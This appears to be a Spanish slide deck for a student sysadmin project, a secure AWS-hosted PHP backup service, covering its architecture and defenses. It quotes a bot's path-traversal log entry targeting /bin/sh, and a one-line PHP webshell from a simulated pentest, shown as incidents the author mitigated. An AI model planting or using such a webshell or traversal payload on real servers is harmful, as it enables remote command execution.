Flor No Me Olvides

Proyecto ASIR:
No Me Olvides

Infraestructura Cloud Segura y Gestión de Backups

Samuel Pérez Tavío

Never Forget SL

samupt7@gmail.com LinkedIn github.com/samux66
01 / 12

El Proyecto

Never Forget SL

Administradores de sistemas ASIR creando almacenamiento seguro e intuitivo para empresas.

"No Me Olvides"

Tus datos accesibles 24/7 en el Cloud, blindados y centralizados al mejor precio.

02 / 12

El Problema vs. La Solución

Riesgos Locales (Pymes)

  • Discos Locales: SPOF crítico (Single Point of Failure).
  • Ransomware: Secuestros de datos en aumento constante.
  • Shadow IT: Uso de USBs no corporativos y peligrosos.

Solución Cloud Segura

  • Disponibilidad: Nube de AWS EC2 de alta disponibilidad.
  • Confidencialidad: Tráfico HTTPS y encriptación Bcrypt.
  • Integridad: Panel PHP aislado lógicamente.
03 / 12

Contexto Nacional: Informe INCIBE

Informe INCIBE Ciberseguridad
04 / 12

Análisis de Amenazas 2025

El ecosistema digital español se enfrenta a un volumen histórico de ataques:

+122K

Incidentes totales gestionados (+26% respecto a 2024).

+55K

Infecciones por Malware (incluyendo ransomware y botnets).

+45K

Casos de Fraude Online (Phishing como principal vector).

05 / 12

Herramientas Base

AWS EC2

Infraestructura escalable con IP Elástica persistente.

Apache2

Apache2 & PHP

Motor web estable y lógica CRUD segura bajo demanda.

Certbot

Certbot & DuckDNS

Dominio y cifrado HTTPS totalmente automatizado.

06 / 12

Topología: El Viaje del Dato

Cómo fluye la información de forma segura desde el cliente hasta la nube.

1. Usuario

Certbot SSL

2. Conexión SSL

3. Firewall UFW

Apache PHP

4. Aplicación

5. Disco AWS

07 / 12

Defensa en Profundidad

No dependemos de una sola barrera. Son múltiples capas concéntricas.

// A nivel de PHP: Bloqueo de inyecciones
$archivo_limpio = basename($_GET['file']);

1. Perímetro (UFW + Fail2Ban)

Bloqueo total por defecto y baneo automático de bots hostiles.

2. Transporte (Certbot)

Cifrado SSL obligatorio para evitar espionaje en red.

3. Aplicación (Blocklist PHP)

Rechazo de código ejecutable (.php, .sh) en subidas.

08 / 12

Optimización (Sostenibilidad)

Hardware Limitado (t3.micro)

El Tier Gratuito de AWS ofrece CPU limitada y solo 3.9 GB libres.

Por ello, se pivotó de copias masivas con Cron a backups bajo demanda administrados por el usuario para evitar el colapso del disco.

JSON vs MySQL

Instalar MySQL habría saturado la memoria RAM. Usamos un archivo JSON protegido para gestionar a los usuarios.

// Contraseñas aseguradas algorítmicamente
$hash = password_hash($pass, PASSWORD_BCRYPT);

Seguridad robusta sin devorar los recursos de la máquina.

09 / 12

Ataques Externos (Botnets)

1. Detección (Logs)

Detectamos bots intentando saltar directorios (/bin/sh).

AH10244: invalid URI path (/cgi-bin/.%2e/.../bin/sh)

Apache bloqueó el ataque automáticamente.

2. Inteligencia (OSINT)

Analizamos las IPs bloqueadas con AbuseIPDB:

  • 🔴 IP 120.48... : Botnet desde China (Baidu).
  • 🔴 IP 154.193... : Escáner masivo de EE. UU.

*Fail2Ban se encarga ahora de banear estas IPs recurrentes.*

10 / 12

Respuesta a Incidentes (Pentesting)

1. El Ataque Simulado

Un test de penetración intentó evadir los filtros subiendo un .htaccess para ejecutar un Payload malicioso camuflado como foto.

<?php system($_GET['cmd']); ?>

Clasificación: Webshell de Ejecución Remota de Comandos (RCE).

2. Mitigación y Parcheo

Nuestra estricta configuración desactivó la amenaza. Tras analizarlo, cerramos la brecha definitivamente:

  • Eliminamos la carpeta maliciosa y su usuario.
  • Parcheamos upload.php para bloquear ".htaccess".
11 / 12

"El único sistema verdaderamente seguro es aquel que está apagado, enterrado en hormigón y sellado con guardias armados... y aún así, tengo mis dudas."

— Eugene Spafford

La seguridad absoluta no existe, pero una buena Arquitectura de Defensa marca la diferencia entre un susto y una catástrofe empresarial.

Gracias por su atención.

12 / 12